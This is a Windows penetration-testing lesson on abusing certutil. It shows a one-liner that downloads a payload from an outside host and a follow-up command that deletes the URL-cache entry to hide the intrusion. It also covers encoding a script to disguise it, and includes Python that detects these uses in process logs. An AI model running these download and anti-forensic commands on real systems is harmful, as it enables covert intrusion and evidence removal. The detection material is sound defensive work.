# Lesson 38: Downloading a payload with a certutil one-liner

## How Microsoft officially describes certutil:

> Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.

url: <https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732443(v=ws.11)>

In recent years, however, it has been thoroughly abused: it is a Microsoft-signed binary present on every Windows install, and it will happily fetch an arbitrary URL, which makes it a favourite living-off-the-land download tool.

**Targets:** Windows 2003, Windows 7

```bash
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
```

![](/files/-LZJx4s87viULMN5Li17)

By default the download is saved as a .bin file, but that does not stop it from being used from the command line. (An output file name can also be given as the last argument after the URL if you want the original name.)\
![](/files/-LZJx4sCoZKB4hPFBLNf)

Downloading with certutil.exe has a drawback: every fetch leaves an entry in the URL cache, which leaves a trace of the intrusion. So after each download, **run the following immediately**:

```bash
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete
```

![](/files/-LZJx4sEu1RE_BvyflIl)

On the incident-response side, certutil is also a commonly used tool: its -hashfile switch computes a file hash, which can be compared against a known-good or known-bad value to triage a suspicious file.

**Windows 2003:**\
![](/files/-LZJx4sHqMsMyBT8OsEB)

**Windows 7:**\
![](/files/-LZJx4sKyd0DeYdClXhE)
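The two one-liners above (the fetch and the cache `delete`) and the benign `-hashfile` use shown in the incident-response screenshots are exactly the command lines a detection engineer needs to tell apart. The following Python is an added example, not code from the original lesson: it classifies constructed Sysmon-style process-creation records (made up for this example) by certutil switch, flagging remote fetches, URL-cache deletion and encode/decode while leaving `-hashfile` unflagged. The `-verifyctl` fetch variant is included as a second download path that LOLBAS documents for certutil; the sample records and the finding tag names are my own.

```python
import re

# Constructed sample process-creation records in the shape of Sysmon Event ID 1
# (Image, CommandLine). Made up for this example, not real telemetry; the first
# two are the download and cache-delete one-liners from this lesson.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt"),
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete"),
    (r"C:\Windows\System32\certutil.exe",               # slash switches, quoted URL
     'certutil /URLCACHE /f "http://192.168.1.115/a.txt" a.txt'),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -encode c:\downfile.vbs downfile.bat"),
    (r"C:\Windows\System32\certutil.exe",
     "certutil -decode downfile.bat downfile.txt"),
    (r"C:\Windows\System32\certutil.exe",               # benign incident-response use
     r"certutil -hashfile C:\Windows\Temp\suspect.exe SHA256"),
    (r"C:\Windows\System32\certutil.exe",               # alternate fetch path (LOLBAS)
     "certutil -verifyctl -f -split http://192.168.1.115/robots.txt"),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
ENCODING_SWITCHES = {"encode", "decode", "decodehex", "encodehex"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN_RE.finditer(cmdline)]


def classify_certutil(cmdline, image=None):
    """Classify one certutil invocation.

    Returns None when the process is not certutil, an empty list when certutil is
    doing something unremarkable (e.g. -hashfile), or a list of finding tags.
    certutil accepts both '-' and '/' as switch prefixes and is case-insensitive,
    so both are normalised before matching.
    """
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = (image or tokens[0]).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("certutil", "certutil.exe"):
        return None
    is_switch = lambda t: len(t) > 1 and t[0] in "-/"
    switches = {t[1:].lower() for t in tokens[1:] if is_switch(t)}
    operands = [t for t in tokens[1:] if not is_switch(t)]
    urls = [o for o in operands if URL_RE.match(o)]
    wants_delete = any(o.lower() == "delete" for o in operands)

    findings = []
    if "urlcache" in switches and wants_delete:
        findings.append("urlcache-delete")      # anti-forensics: wiping the cache entry
    elif (switches & DOWNLOAD_SWITCHES) and urls:
        findings.append("remote-download")      # fetching content from a URL
    if switches & ENCODING_SWITCHES:
        findings.append("encode-decode")        # Base64/hex (un)wrapping of a file
    return findings


def scan_events(events):
    """Return (command_line, findings) for every record that raised at least one finding."""
    hits = []
    for image, cmdline in events:
        findings = classify_certutil(cmdline, image)
        if findings:
            hits.append((cmdline, findings))
    return hits


if __name__ == "__main__":
    for cmdline, findings in scan_events(SAMPLE_EVENTS):
        print(", ".join(findings).ljust(28), cmdline)
```

Note that the cache-wiping `delete` run is itself a finding: an operator who clears the URL cache right after a fetch produces two certutil events within seconds, which is a stronger signal than either alone. Matching on the token after the last backslash misses a renamed copy of the binary; in real telemetry, key on Sysmon's OriginalFileName field instead.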

## Other advanced uses of certutil:

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

![](/files/-LZJx4sMgzXvrFab7doh)

**file:downfile.bat**

![](/files/-LZJx4sOazaEzuQOseVS)

**Decoding:**\
![](/files/-LZJx4sQJd3k2-1rd7oy)

**file:downfile.txt**\
![](/files/-LZJx4sSXk4TuXM-fC_r)
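The `-encode`/`-decode` pair above wraps the file in the same Base64 armour a PEM certificate uses, which is what makes `downfile.bat` look like a certificate on disk. The Python below is an added example, not the author's code: it reproduces that layout (CERTIFICATE header and footer, 64-column Base64 body, CRLF line endings), reverses it, and adds a triage heuristic for spotting armoured files whose body is not actually DER. The sample script bytes are constructed for the example.

```python
import base64

BEGIN_LINE = "-----BEGIN CERTIFICATE-----"
END_LINE = "-----END CERTIFICATE-----"

# Constructed stand-in for downfile.vbs: a harmless one-liner, not a real payload.
SAMPLE_VBS = b'WScript.Echo "constructed sample, not a real payload"\r\n'


def certutil_encode(data: bytes) -> str:
    """Produce the layout `certutil -encode` writes: CERTIFICATE armour lines,
    Base64 body wrapped at 64 columns, CRLF line endings."""
    b64 = base64.b64encode(data).decode("ascii")
    body = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([BEGIN_LINE, *body, END_LINE]) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """Recover the original bytes from such a file: drop the armour lines and
    blank lines, then Base64-decode the concatenated body."""
    body = "".join(line.strip() for line in text.splitlines()
                   if line.strip() and not line.startswith("-----"))
    return base64.b64decode(body, validate=True)


def is_disguised_payload(text: str) -> bool:
    """Triage heuristic for a file wearing CERTIFICATE armour (e.g. downfile.bat).

    A genuine certificate decodes to DER, which begins with 0x30 (ASN.1 SEQUENCE).
    An armoured file whose body decodes to anything else is script or binary
    content disguised with `certutil -encode`. Heuristic only: an attacker can
    prepend bytes to defeat it, so treat a hit as a hint for analysis, not proof.
    """
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    if len(lines) < 3 or lines[0] != BEGIN_LINE or lines[-1] != END_LINE:
        return False
    try:
        payload = certutil_decode(text)
    except ValueError:          # binascii.Error is a ValueError: body is not valid Base64
        return False
    return len(payload) > 0 and payload[0] != 0x30


if __name__ == "__main__":
    armoured = certutil_encode(SAMPLE_VBS)
    print(armoured)
    print("round-trip ok:", certutil_decode(armoured) == SAMPLE_VBS)
    print("disguised payload:", is_disguised_payload(armoured))
```

The heuristic is cheap to run across a directory of `.bat`, `.txt` or `.log` files: anything carrying CERTIFICATE armour under a non-certificate extension, and not decoding to a DER SEQUENCE, deserves a closer look.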

> As for the latter: PowerShell in-memory loading combined with certutil decoding is a very interesting thing. It will be covered in a future installment of the series.
>
> Micropoor
